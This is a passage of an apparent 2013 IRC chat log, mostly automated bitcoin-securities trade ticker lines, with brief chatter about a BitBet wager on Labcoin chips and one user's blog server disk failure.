04:16:05 [MPEX] [S.MPOE] 6072 @ 0.0008751 = 5.3136 BTC [+] Aug 29 04:21:13 [BTCTC] [ASICMINER-PT] 1 @ 2.715 BTC [-] Aug 29 04:22:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.0273 BTC [+] Aug 29 04:22:20 [BTCTC] [ASICMINER-PT] 1 @ 2.716 BTC [+] Aug 29 04:22:21 [BTCTC] [ASICMINER-PT] 1 @ 2.716 BTC [+] Aug 29 04:22:31 [BTCTC] [DMS.SELLING] 225 @ 0.0124 = 2.79 BTC [+] Aug 29 04:24:19 [BTCTC] [LABCOIN] 22 @ 0.002961 = 0.0651 BTC [+] Aug 29 04:26:16 [BTCTC] [DMS.MINING] 80 @ 0.00345 = 0.276 BTC [-] Aug 29 04:28:55 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [+] Aug 29 04:33:24 [BTCTC] [LABCOIN] 200 @ 0.002948 = 0.5896 BTC [-] Aug 29 04:35:00 [MPEX] [S.MPOE] 2678 @ 0.0008751 = 2.3435 BTC [+] Aug 29 04:35:05 [MPEX] [S.MPOE] 8197 @ 0.0008792 = 7.2068 BTC [+] Aug 29 04:35:35 [BTCTC] [LABCOIN] 3 @ 0.00294 = 0.0088 BTC [-] Aug 29 04:36:07 [BTCTC] [LABCOIN] 2 @ 0.002945 = 0.0059 BTC [+] Aug 29 04:36:18 [HAVELOCK] [VTX] 2 @ 0.6 = 1.2 BTC [+] Aug 29 04:43:44 [HAVELOCK] [AM100] 1 @ 0.02599 BTC [+] Aug 29 04:47:19 [BTCTC] [RSM] 1 @ 0.0149 BTC [-] Aug 29 04:50:13 [BTCTC] [BASIC-MINING] 2 @ 0.202 = 0.404 BTC [+] Aug 29 04:50:21 [BTCTC] [BASIC-MINING] 2 @ 0.2023 = 0.4046 BTC [+] Aug 29 04:52:51 [BTCTC] [DMS.MINING] 13 @ 0.0035 = 0.0455 BTC [+] Aug 29 04:56:53 [BTCTC] [HOSTED-MINING] 1 @ 0.002798 BTC [+] Aug 29 04:57:32 [BTCTC] [ASICMINER-PT] 1 @ 2.68 BTC [-] Aug 29 05:00:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.02674 BTC [-] Aug 29 05:00:58 [BTCTC] [TAT.ASICMINER] 4 @ 0.02673 = 0.1069 BTC [-] Aug 29 05:01:00 [BTCTC] [TAT.ASICMINER] 30 @ 0.0267 = 0.801 BTC [-] Aug 29 05:01:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.02661 = 0.0532 BTC [-] Aug 29 05:01:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.0266 = 0.266 BTC [-] Aug 29 05:01:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.0266 BTC [-] Aug 29 05:01:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.02729 BTC [+] Aug 29 05:04:32 [BTCTC] [HOSTED-MINING] 20 @ 0.00264 = 0.0528 BTC [-] Aug 29 05:04:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.02728 = 0.0546 BTC [-] Aug 29 05:07:31 [BTCTC] [TAT.ASICMINER] 13 @ 0.02729 = 0.3548 BTC [+] Aug 29 05:08:14 [BTCTC] [LABCOIN] 200 @ 0.002895 = 0.579 BTC [-] Aug 29 05:10:33 [BTCTC] [ASICMINER-PT] 1 @ 2.719 BTC [+] Aug 29 05:10:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.02729 = 0.0546 BTC [+] Aug 29 05:12:13 [BTCTC] [LABCOIN] 206 @ 0.002891 = 0.5955 BTC [-] Aug 29 05:12:16 [BTCTC] [LABCOIN] 20 @ 0.002891 = 0.0578 BTC [-] Aug 29 05:13:35 [BTCTC] [LABCOIN] 576 @ 0.00289 = 1.6646 BTC [-] Aug 29 05:16:37 [BTCTC] [ACTIVEMINING] 1000 @ 0.0047 = 4.7 BTC [-] Aug 29 05:17:42 [BTCTC] [LABCOIN] 20 @ 0.002889 = 0.0578 BTC [-] Aug 29 05:18:50 [BTCTC] [LABCOIN] 20 @ 0.002892 = 0.0578 BTC [+] Aug 29 05:19:05 [BTCTC] [LABCOIN] 20 @ 0.002893 = 0.0579 BTC [+] Aug 29 05:22:24 [BTCTC] [ACTIVEMINING] 60 @ 0.004769 = 0.2861 BTC [+] Aug 29 05:22:29 [BTCTC] [ACTIVEMINING] 410 @ 0.004769 = 1.9553 BTC [+] Aug 29 05:24:57 [HAVELOCK] [AM100] 1 @ 0.02598 BTC [-] Aug 29 05:25:29 [HAVELOCK] [AM100] 4 @ 0.02599 = 0.104 BTC [+] Aug 29 05:28:58 [BTCTC] [MININGCO.ETF] 8 @ 0.103 = 0.824 BTC [-] Aug 29 05:29:00 [BTCTC] [MININGCO.ETF] 1 @ 0.103 BTC [-] Aug 29 05:29:01 [BTCTC] [MININGCO.ETF] 20 @ 0.102 = 2.04 BTC [-] Aug 29 05:29:02 [BTCTC] [MININGCO.ETF] 15 @ 0.102 = 1.53 BTC [-] Aug 29 05:29:04 [BTCTC] [MININGCO.ETF] 12 @ 0.1011 = 1.2132 BTC [-] Aug 29 05:29:05 [BTCTC] [MININGCO.ETF] 30 @ 0.101 = 3.03 BTC [-] Aug 29 05:29:06 [BTCTC] [MININGCO.ETF] 9 @ 0.1002 = 0.9018 BTC [-] Aug 29 05:29:07 [BTCTC] [MININGCO.ETF] 20 @ 0.1002 = 2.004 BTC [-] Aug 29 05:30:02 [BTCTC] [LABCOIN] 102 @ 0.00292 = 0.2978 BTC [+] Aug 29 05:30:03 [BTCTC] [LABCOIN] 102 @ 0.002921 = 0.2979 BTC [+] Aug 29 05:30:03 [BTCTC] [LABCOIN] 20 @ 0.003049 = 0.061 BTC [+] Aug 29 05:30:05 [BTCTC] [LABCOIN] 126 @ 0.003049 = 0.3842 BTC [+] Aug 29 05:30:34 [BTCTC] [LABCOIN] 102 @ 0.002919 = 0.2977 BTC [-] Aug 29 05:34:13 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 29 05:38:44 [BTCTC] [ACTIVEMINING] 470 @ 0.004752 = 2.2334 BTC [-] Aug 29 05:42:20 [BTCTC] [ACTIVEMINING] 1 @ 0.004651 BTC [-] Aug 29 05:47:54 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 29 05:48:56 [BTCTC] [ACTIVEMINING] 558 @ 0.004741 = 2.6455 BTC [+] Aug 29 05:48:58 [BTCTC] [ACTIVEMINING] 558 @ 0.004742 = 2.646 BTC [+] Aug 29 05:48:59 [BTCTC] [ACTIVEMINING] 25 @ 0.00475 = 0.1188 BTC [+] Aug 29 05:49:00 [BTCTC] [ACTIVEMINING] 50 @ 0.004751 = 0.2376 BTC [+] Aug 29 05:50:18 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1981 BTC [-] Aug 29 05:52:23 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 29 05:55:34 [BTCTC] [LABCOIN] 10 @ 0.002981 = 0.0298 BTC [+] Aug 29 05:57:30 [BTCTC] [DMS.SELLING] 180 @ 0.01258 = 2.2644 BTC [+] Aug 29 05:58:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.027 = 0.054 BTC [-] Aug 29 05:58:27 [BTCTC] [DMS.MINING] 34 @ 0.0035 = 0.119 BTC [+] Aug 29 06:02:53 [BTCTC] [DMS.PURCHASE] 7 @ 0.01598 = 0.1119 BTC [+] Aug 29 06:03:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [-] Aug 29 06:04:14 [BTCTC] [LABCOIN] 1 @ 0.002849 BTC [-] Aug 29 06:04:26 [BTCTC] [NASTY-PT] 20 @ 0.002085 = 0.0417 BTC [+] Aug 29 06:06:59 [BTCTC] [DMS.MINING] 7 @ 0.0035 = 0.0245 BTC [+] Aug 29 06:07:50 [BTCTC] [LABCOIN] 19 @ 0.00289 = 0.0549 BTC [+] Aug 29 06:08:33 [BTCTC] [DMS.PURCHASE] 22 @ 0.01598 = 0.3516 BTC [+] Aug 29 06:08:53 [BTCTC] [ASICMINER-PT] 2 @ 2.719 = 5.438 BTC [+] Aug 29 06:08:55 [BTCTC] [ASICMINER-PT] 1 @ 2.719 BTC [+] Aug 29 06:09:26 [BTCTC] [LABCOIN] 200 @ 0.002944 = 0.5888 BTC [+] Aug 29 06:09:49 [BTCTC] [DMS.PURCHASE] 72 @ 0.01598 = 1.1506 BTC [+] Aug 29 06:12:29 [BTCTC] [DMS.MINING] 22 @ 0.0035 = 0.077 BTC [+] Aug 29 06:12:30 [MPEX] [S.MPOE] 4400 @ 0.0008792 = 3.8685 BTC [+] Aug 29 06:12:43 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [+] Aug 29 06:12:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.027 = 0.081 BTC [-] Aug 29 06:13:28 [BTCTC] [KENILWORTH] 2 @ 0.001799 = 0.0036 BTC [-] Aug 29 06:13:30 [BTCTC] [KENILWORTH] 775 @ 0.0018 = 1.395 BTC [+] Aug 29 06:13:43 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [+] Aug 29 06:14:26 [BTCTC] [DMS.PURCHASE] 5 @ 0.01598 = 0.0799 BTC [+] Aug 29 06:16:13 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [+] Aug 29 06:18:23 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [+] Aug 29 06:20:13 [HAVELOCK] [AM100] 2 @ 0.0259 = 0.0518 BTC [-] Aug 29 06:22:35 [BTCTC] [DMS.MINING] 5 @ 0.0035 = 0.0175 BTC [+] Aug 29 06:22:56 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [+] Aug 29 06:23:29 [BTCTC] [TAT.ASICMINER] 61 @ 0.027 = 1.647 BTC [-] Aug 29 06:24:46 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [+] Aug 29 06:25:07 [BTCTC] [LABCOIN] 3 @ 0.002994 = 0.009 BTC [+] Aug 29 06:25:44 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [+] Aug 29 06:27:48 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [+] Aug 29 06:28:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.02602 = 0.0781 BTC [-] Aug 29 06:28:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [+] Aug 29 06:29:13 [BTCTC] [LABCOIN] 29 @ 0.002899 = 0.0841 BTC [-] Aug 29 06:29:17 [MPEX] [S.MPOE] 4073 @ 0.00087281 = 3.555 BTC [-] Aug 29 06:29:19 [MPEX] [S.MPOE] 9427 @ 0.00087159 = 8.2165 BTC [-] Aug 29 06:31:44 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [+] Aug 29 06:32:49 [BTCTC] [TAT.ASICMINER] 11 @ 0.02602 = 0.2862 BTC [-] Aug 29 06:33:05 [BTCTC] [TAT.ASICMINER] 6 @ 0.02601 = 0.1561 BTC [-] Aug 29 06:33:51 [BTCTC] [LABCOIN] 5 @ 0.002858 = 0.0143 BTC [-] Aug 29 06:33:52 [BTCTC] [LABCOIN] 1 @ 0.002857 BTC [-] Aug 29 06:33:54 [BTCTC] [LABCOIN] 20 @ 0.002856 = 0.0571 BTC [-] Aug 29 06:33:55 [BTCTC] [LABCOIN] 3 @ 0.002855 = 0.0086 BTC [-] Aug 29 06:34:31 [BTCTC] [LABCOIN] 57 @ 0.002855 = 0.1627 BTC [-] Aug 29 06:34:33 [BTCTC] [LABCOIN] 142 @ 0.002854 = 0.4053 BTC [-] Aug 29 06:34:34 [BTCTC] [LABCOIN] 100 @ 0.002852 = 0.2852 BTC [-] Aug 29 06:34:35 [BTCTC] [LABCOIN] 90 @ 0.002841 = 0.2557 BTC [-] Aug 29 06:34:36 [BTCTC] [LABCOIN] 250 @ 0.00284 = 0.71 BTC [-] Aug 29 06:34:38 [BTCTC] [LABCOIN] 250 @ 0.002838 = 0.7095 BTC [-] Aug 29 06:34:39 [BTCTC] [LABCOIN] 152 @ 0.002838 = 0.4314 BTC [-] Aug 29 06:35:40 [BTCTC] [BTC-BOND] 303 @ 0.009995 = 3.0285 BTC [-] Aug 29 06:38:07 [BTCTC] [LABCOIN] 250 @ 0.002841 = 0.7103 BTC [+] Aug 29 06:38:09 [BTCTC] [LABCOIN] 20 @ 0.002841 = 0.0568 BTC [+] Aug 29 06:38:09 [BTCTC] [LABCOIN] 50 @ 0.00284 = 0.142 BTC [-] Aug 29 06:38:35 [BTCTC] [BTC-BOND] 86 @ 0.009995 = 0.8596 BTC [-] Aug 29 06:39:49 [BTCTC] [TAT.ASICMINER] 20 @ 0.02625 = 0.525 BTC [+] Aug 29 06:39:50 [BTCTC] [TAT.ASICMINER] 48 @ 0.02625 = 1.26 BTC [+] Aug 29 06:39:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.02602 = 0.2602 BTC [-] Aug 29 06:39:53 [BTCTC] [TAT.ASICMINER] 15 @ 0.026 = 0.39 BTC [-] Aug 29 06:39:54 [BTCTC] [TAT.ASICMINER] 34 @ 0.026 = 0.884 BTC [-] Aug 29 06:39:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0258 BTC [-] Aug 29 06:39:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.02573 = 0.1801 BTC [-] Aug 29 06:39:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.02572 = 0.0772 BTC [-] Aug 29 06:39:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.0257 = 0.1028 BTC [-] Aug 29 06:39:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.0257 BTC [-] Aug 29 06:40:00 [BTCTC] [TAT.ASICMINER] 9 @ 0.0257 = 0.2313 BTC [-] Aug 29 06:40:01 [BTCTC] [TAT.ASICMINER] 20 @ 0.0257 = 0.514 BTC [-] Aug 29 06:40:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.02561 = 0.0512 BTC [-] Aug 29 06:40:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0256 BTC [-] Aug 29 06:40:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.0256 = 0.256 BTC [-] Aug 29 06:40:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.02556 BTC [-] Aug 29 06:40:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.02556 BTC [-] Aug 29 06:40:08 [BTCTC] [TAT.ASICMINER] 5 @ 0.02555 = 0.1278 BTC [-] Aug 29 06:40:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.02555 BTC [-] Aug 29 06:40:10 [BTCTC] [TAT.ASICMINER] 32 @ 0.02552 = 0.8166 BTC [-] Aug 29 06:44:10 [HAVELOCK] [AM100] 2 @ 0.025945 = 0.0519 BTC [+] Aug 29 06:45:47 [BTCTC] [LABCOIN] 200 @ 0.002895 = 0.579 BTC [+] Aug 29 06:47:14 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0007982 = 0.0798 BTC [-] Aug 29 06:47:17 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0007972 = 0.0016 BTC [-] Aug 29 06:47:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00079 BTC [-] Aug 29 06:47:20 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00076 BTC [-] Aug 29 06:47:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000755 BTC [-] Aug 29 06:47:23 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.000755 = 0.0189 BTC [-] Aug 29 06:47:24 [BTCTC] [TAT.VIRTUALMINE] 17 @ 0.0007521 = 0.0128 BTC [-] Aug 29 06:50:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.02554 BTC [+] Aug 29 06:50:59 [BTCTC] [TAT.ASICMINER] 14 @ 0.02552 = 0.3573 BTC [-] Aug 29 06:52:43 [BTCTC] [TAT.ASICMINER] 10 @ 0.02551 = 0.2551 BTC [-] Aug 29 06:52:44 [BTCTC] [TAT.ASICMINER] 6 @ 0.02551 = 0.1531 BTC [-] Aug 29 06:53:55 [BTCTC] [LABCOIN] 145 @ 0.002976 = 0.4315 BTC [+] Aug 29 06:56:01 [BTCTC] [LABCOIN] 38 @ 0.002972 = 0.1129 BTC [-] Aug 29 06:58:15 [BTCTC] [LABCOIN] 1 @ 0.002969 BTC [-] Aug 29 07:02:20 [BTCTC] [LABCOIN] 15 @ 0.002964 = 0.0445 BTC [-] Aug 29 07:06:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [+] Aug 29 07:07:00 [BTCTC] [TAT.ASICMINER] 18 @ 0.02727 = 0.4909 BTC [+] Aug 29 07:09:55 [BTCTC] [TAT.ASICMINER] 5 @ 0.0271 = 0.1355 BTC [-] Aug 29 07:12:50 [BTCTC] [BASIC-MINING] 6 @ 0.1914 = 1.1484 BTC [-] Aug 29 07:12:52 [BTCTC] [BASIC-MINING] 1 @ 0.1915 BTC [+] Aug 29 07:13:04 [BTCTC] [ACTIVEMINING] 50 @ 0.004934 = 0.2467 BTC [+] Aug 29 07:13:05 [BTCTC] [ACTIVEMINING] 50 @ 0.004935 = 0.2468 BTC [+] Aug 29 07:13:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.02709 = 0.1355 BTC [-] Aug 29 07:14:09 [BTCTC] [LABCOIN] 360 @ 0.002953 = 1.0631 BTC [-] Aug 29 07:15:04 [BTCTC] [LABCOIN] 360 @ 0.002954 = 1.0634 BTC [+] Aug 29 07:16:21 [BTCTC] [PAJKA.BOND] 1 @ 0.019 BTC [+] Aug 29 07:16:44 [BTCTC] [LABCOIN] 278 @ 0.002952 = 0.8207 BTC [-] Aug 29 07:16:44 [BTCTC] [LABCOIN] 230 @ 0.002954 = 0.6794 BTC [+] Aug 29 07:16:46 [BTCTC] [LABCOIN] 360 @ 0.002955 = 1.0638 BTC [+] Aug 29 07:17:14 [BTCTC] [ACTIVEMINING] 233 @ 0.004954 = 1.1543 BTC [+] Aug 29 07:17:16 [BTCTC] [ACTIVEMINING] 467 @ 0.004955 = 2.314 BTC [+] Aug 29 07:17:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.0271 = 0.1355 BTC [+] Aug 29 07:17:44 [BTCTC] [DMS.MINING] 2 @ 0.00365 = 0.0073 BTC [+] Aug 29 07:18:17 [BTCTC] [TAT.ASICMINER] 57 @ 0.02727 = 1.5544 BTC [+] Aug 29 07:18:35 http://bitbet.us/bet/521/labcoins-own-130nm-design-sample-chips-will-be/ Aug 29 07:18:40 BitBet - Labcoins own 130nm design sample chips will be received by testers by 12TH SEPT 2013 Aug 29 07:18:43 [BTCTC] [ACTIVEMINING] 35 @ 0.004953 = 0.1734 BTC [-] Aug 29 07:18:55 scamlab about 16:1 against atm, so if any of those fake trades want to take part in some real action... Aug 29 07:19:05 one btc could yield 500% once they deliver. Aug 29 07:19:28 [BTCTC] [ACTIVEMINING] 15 @ 0.004953 = 0.0743 BTC [-] Aug 29 07:19:30 [BTCTC] [ACTIVEMINING] 1 @ 0.004999 BTC [+] Aug 29 07:19:30 [BTCTC] [ACTIVEMINING] 3 @ 0.005 = 0.015 BTC [+] Aug 29 07:19:34 that is 500% :P Aug 29 07:19:56 hm? Aug 29 07:19:59 [BTCTC] [BASIC-MINING] 5 @ 0.193 = 0.965 BTC [+] Aug 29 07:21:02 !ticker btctc labcoin Aug 29 07:21:04 [BTCT:LABCOIN] 1D: 0.001879 / 0.00289 / 0.003798 (1190279 shares, 3445.1 BTC), 7D: 0.001879 / 0.00298 / 0.003867 (3669036 shares, 10919.1 BTC), 30D: 0.001 / 0.00183 / 0.0044 (19700799 shares, 36032.3 BTC) Aug 29 07:21:12 preeety lulzy. Aug 29 07:21:24 oh mircea_popescu you have Diablo-D3 on ignore :P Aug 29 07:21:46 well... it's a privilege not a right >D Aug 29 07:21:53 [BTCTC] [LABCOIN] 10 @ 0.002953 = 0.0295 BTC [-] Aug 29 07:21:54 [BTCTC] [LABCOIN] 20 @ 0.002954 = 0.0591 BTC [+] Aug 29 07:21:55 [BTCTC] [LABCOIN] 50 @ 0.002956 = 0.1478 BTC [+] Aug 29 07:21:57 [BTCTC] [LABCOIN] 100 @ 0.002957 = 0.2957 BTC [+] Aug 29 07:21:58 [BTCTC] [LABCOIN] 132 @ 0.003024 = 0.3992 BTC [+] Aug 29 07:21:59 [BTCTC] [LABCOIN] 1000 @ 0.003028 = 3.028 BTC [+] Aug 29 07:22:00 [BTCTC] [LABCOIN] 807 @ 0.003029 = 2.4444 BTC [+] Aug 29 07:22:01 [BTCTC] [LABCOIN] 631 @ 0.00303 = 1.9119 BTC [+] Aug 29 07:23:17 i think labcoin will have their chips by the stated date, but the bitbet resolve would be hard "at least 5 actual credible forum members (PR outlets and known shills specifically excluded) that credibly show their sample ASIC chip working to specification." Aug 29 07:23:37 why's that hard ? Aug 29 07:23:45 [BTCTC] [LABCOIN] 176 @ 0.00302 = 0.5315 BTC [-] Aug 29 07:23:45 [BTCTC] [LABCOIN] 132 @ 0.003028 = 0.3997 BTC [+] Aug 29 07:23:52 do you know if they are gonna join a pool to mine or attempt solo? Aug 29 07:24:01 [BTCTC] [LABCOIN] 92 @ 0.003028 = 0.2786 BTC [+] Aug 29 07:24:46 samples would have to be sent to credible forum persons within 14 days, i haven't read anything saying they plan to do that Aug 29 07:24:57 [HAVELOCK] [VTX] 1 @ 0.6 BTC [+] Aug 29 07:25:55 right. Aug 29 07:26:32 [HAVELOCK] [AM100] 2 @ 0.025945 = 0.0519 BTC [+] Aug 29 07:26:47 it is indeed very hard to send imaginary miners to actual people. Aug 29 07:26:59 butr anyway, i'm off. take care all. Aug 29 07:27:04 hehe Aug 29 07:27:10 [HAVELOCK] [SDSTM] 1 @ 0.00449 BTC [-] Aug 29 07:28:20 [HAVELOCK] [XBOND] 2 @ 0.00119887 = 0.0024 BTC [-] **** BEGIN LOGGING AT Thu Aug 29 16:33:24 2013 Aug 29 16:34:29 [BTCTC] [LABCOIN] 725 @ 0.003295 = 2.3889 BTC [-] Aug 29 16:36:00 motherfucker. Aug 29 16:36:25 so overnight the hdd of my server holding my blog has died. Aug 29 16:36:57 fsck is done, new os installed, restoring from backups atm. trilema should be back online within a few hours. Aug 29 16:37:08 [BTCTC] [LABCOIN] 2900 @ 0.003279 = 9.5091 BTC [-] Aug 29 16:37:15 a wise man is one with backups Aug 29 16:37:30 how many visitors do you usually get a day? Aug 29 16:37:30 feed me trilema...MOAR Aug 29 16:37:52 KRS-1 for some reason it has failed in such a manner you can't just dump a hdd in the raid hotswap and repropagate Aug 29 16:37:56 which meh Aug 29 16:38:12 Rulother it varies considerably, a few thousand at the low end Aug 29 16:38:50 Nice Aug 29 16:42:46 [BTCTC] [LABCOIN] 50 @ 0.003265 = 0.1633 BTC [-] Aug 29 16:43:03 anyway, jurov : http://trilema.com/2013/art-over-time-a-graph-of-progress/ for when it's back. Aug 29 16:43:16 [BTCTC] [LABCOIN] 50 @ 0.003264 = 0.1632 BTC [-] Aug 29 16:43:17 [BTCTC] [LABCOIN] 73 @ 0.003265 = 0.2383 BTC [+] Aug 29 16:43:34 [BTCTC] [ASICMINER-PT] 1 @ 2.649 BTC [+] Aug 29 16:43:45 [BTCTC] [LABCOIN] 15 @ 0.003265 = 0.049 BTC [+] Aug 29 16:43:46 [BTCTC] [LABCOIN] 115 @ 0.003266 = 0.3756 BTC [+] Aug 29 16:44:19 [BTCTC] [ASICMINER-PT] 1 @ 2.649 BTC [+] Aug 29 16:45:45 [BTCTC] [DMS.MINING] 4 @ 0.00361 = 0.0144 BTC [+] Aug 29 16:46:13 [BTCTC] [LABCOIN] 60 @ 0.003265 = 0.1959 BTC [-] Aug 29 16:47:10 [BTCTC] [LABCOIN] 56 @ 0.003267 = 0.183 BTC [+] Aug 29 16:47:11 [BTCTC] [LABCOIN] 29 @ 0.003268 = 0.0948 BTC [+] Aug 29 16:47:38 [BTCTC] [LABCOIN] 56 @ 0.003268 = 0.183 BTC [+] Aug 29 16:49:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.02655 BTC [-] Aug 29 16:49:25 [BTCTC] [LABCOIN] 4 @ 0.003428 = 0.0137 BTC [+] Aug 29 16:49:53 [BTCTC] [CB.IDIFF-E] 10 @ 0.029 = 0.29 BTC Aug 29 16:50:29 [BTCTC] [LABCOIN] 4 @ 0.003428 = 0.0137 BTC [+] Aug 29 16:50:31 [BTCTC] [LABCOIN] 20 @ 0.003476 = 0.0695 BTC [+] Aug 29 16:50:32 [BTCTC] [LABCOIN] 1878 @ 0.0035 = 6.573 BTC [+] Aug 29 16:50:33 [BTCTC] [LABCOIN] 70 @ 0.00355 = 0.2485 BTC [+] Aug 29 16:50:34 [BTCTC] [LABCOIN] 1000 @ 0.003555 = 3.555 BTC [+] Aug 29 16:50:35 [BTCTC] [LABCOIN] 970 @ 0.00358 = 3.4726 BTC [+] Aug 29 16:50:37 [BTCTC] [LABCOIN] 1635 @ 0.003586 = 5.8631 BTC [+] Aug 29 16:50:38 [BTCTC] [LABCOIN] 1000 @ 0.003587 = 3.587 BTC [+] Aug 29 16:50:39 [BTCTC] [LABCOIN] 500 @ 0.00359 = 1.795 BTC [+] Aug 29 16:50:39 [BTCTC] [LABCOIN] 851 @ 0.003592 = 3.0568 BTC [+] Aug 29 16:50:40 [BTCTC] [LABCOIN] 1 @ 0.003597 BTC [+] Aug 29 16:50:41 [BTCTC] [LABCOIN] 850 @ 0.003597 = 3.0575 BTC [+] Aug 29 16:50:42 [BTCTC] [LABCOIN] 1 @ 0.0036 BTC [+] Aug 29 16:50:43 [BTCTC] [LABCOIN] 860 @ 0.0036 = 3.096 BTC [+] Aug 29 16:50:45 [BTCTC] [LABCOIN] 1000 @ 0.0036 = 3.6 BTC [+] Aug 29 16:50:46 [BTCTC] [LABCOIN] 198 @ 0.0036 = 0.7128 BTC [+] Aug 29 16:52:34 [BTCTC] [ASICMINER-PT] 1 @ 2.649 BTC [+] Aug 29 16:52:53 [BTCTC] [LABCOIN] 132 @ 0.003426 = 0.4522 BTC [-] Aug 29 16:52:54 [BTCTC] [LABCOIN] 198 @ 0.003427 = 0.6785 BTC [+] Aug 29 16:55:05 [BTCTC] [ASICMINER-PT] 1 @ 2.585 BTC [-] Aug 29 16:55:35 [HAVELOCK] [CFIG] 1 @ 0.18999 BTC [+] Aug 29 16:55:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.02655 BTC [-] Aug 29 16:56:42 [BTCTC] [TAT.ASICMINER] 22 @ 0.0261 = 0.5742 BTC [-] Aug 29 16:57:37 [BTCTC] [BTC-GROWTH] 67 @ 0.1001 = 6.7067 BTC [+] Aug 29 16:57:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.02604 = 0.0781 BTC [-] Aug 29 16:57:58 [BTCTC] [BTC-BOND] 4 @ 0.01 = 0.04 BTC [+] Aug 29 16:58:43 [BTCTC] [TAT.ASICMINER] 30 @ 0.02603 = 0.7809 BTC [-] Aug 29 16:58:57 [BTCTC] [LABCOIN] 312 @ 0.003566 = 1.1126 BTC [+] Aug 29 16:58:58 [BTCTC] [LABCOIN] 156 @ 0.003567 = 0.5565 BTC [+] Aug 29 16:59:00 [BTCTC] [LABCOIN] 120 @ 0.003569 = 0.4283 BTC [+] Aug 29 16:59:01 [BTCTC] [LABCOIN] 60 @ 0.00357 = 0.2142 BTC [+] Aug 29 16:59:01 [BTCTC] [LABCOIN] 860 @ 0.003584 = 3.0822 BTC [+] Aug 29 16:59:04 [BTCTC] [LABCOIN] 430 @ 0.003585 = 1.5416 BTC [+] Aug 29 16:59:04 [BTCTC] [LABCOIN] 199 @ 0.003589 = 0.7142 BTC [+] Aug 29 16:59:05 [BTCTC] [LABCOIN] 1895 @ 0.00359 = 6.8031 BTC [+] Aug 29 16:59:06 [BTCTC] [LABCOIN] 1500 @ 0.003598 = 5.397 BTC [+] Aug 29 16:59:07 [BTCTC] [LABCOIN] 1000 @ 0.003599 = 3.599 BTC [+] Aug 29 16:59:08 [BTCTC] [LABCOIN] 2000 @ 0.003599 = 7.198 BTC [+] Aug 29 16:59:09 [BTCTC] [LABCOIN] 850 @ 0.00364 = 3.094 BTC [+] Aug 29 16:59:11 [BTCTC] [LABCOIN] 200 @ 0.003643 = 0.7286 BTC [+] Aug 29 16:59:12 [BTCTC] [LABCOIN] 850 @ 0.003644 = 3.0974 BTC [+] Aug 29 16:59:13 [BTCTC] [LABCOIN] 150 @ 0.003645 = 0.5468 BTC [+] Aug 29 16:59:13 [BTCTC] [LABCOIN] 84 @ 0.003645 = 0.3062 BTC [+] Aug 29 16:59:20 [HAVELOCK] [AM100] 3 @ 0.0259 = 0.0777 BTC [-] Aug 29 17:00:14 [HAVELOCK] [AM100] 10 @ 0.0259 = 0.259 BTC [-] Aug 29 17:01:39 [BTCTC] [DMS.SELLING] 65 @ 0.01258 = 0.8177 BTC [+] Aug 29 17:01:49 [BTCTC] [LABCOIN] 156 @ 0.00362 = 0.5647 BTC [-] Aug 29 17:01:50 [BTCTC] [BTC-GROWTH] 1 @ 0.1004 BTC [+] Aug 29 17:01:52 [BTCTC] [BTC-GROWTH] 34 @ 0.1005 = 3.417 BTC [+] Aug 29 17:02:17 [BTCTC] [LABCOIN] 1000 @ 0.00362 = 3.62 BTC [-] Aug 29 17:02:31 [BTCTC] [BASIC-MINING] 2 @ 0.1935 = 0.387 BTC [-] Aug 29 17:03:31 [BTCTC] [LABCOIN] 344 @ 0.00362 = 1.2453 BTC [-] Aug 29 17:04:17 [HAVELOCK] [AM100] 10 @ 0.0259 = 0.259 BTC [-] Aug 29 17:06:45 [BTCTC] [LABCOIN] 140 @ 0.003618 = 0.5065 BTC [-] Aug 29 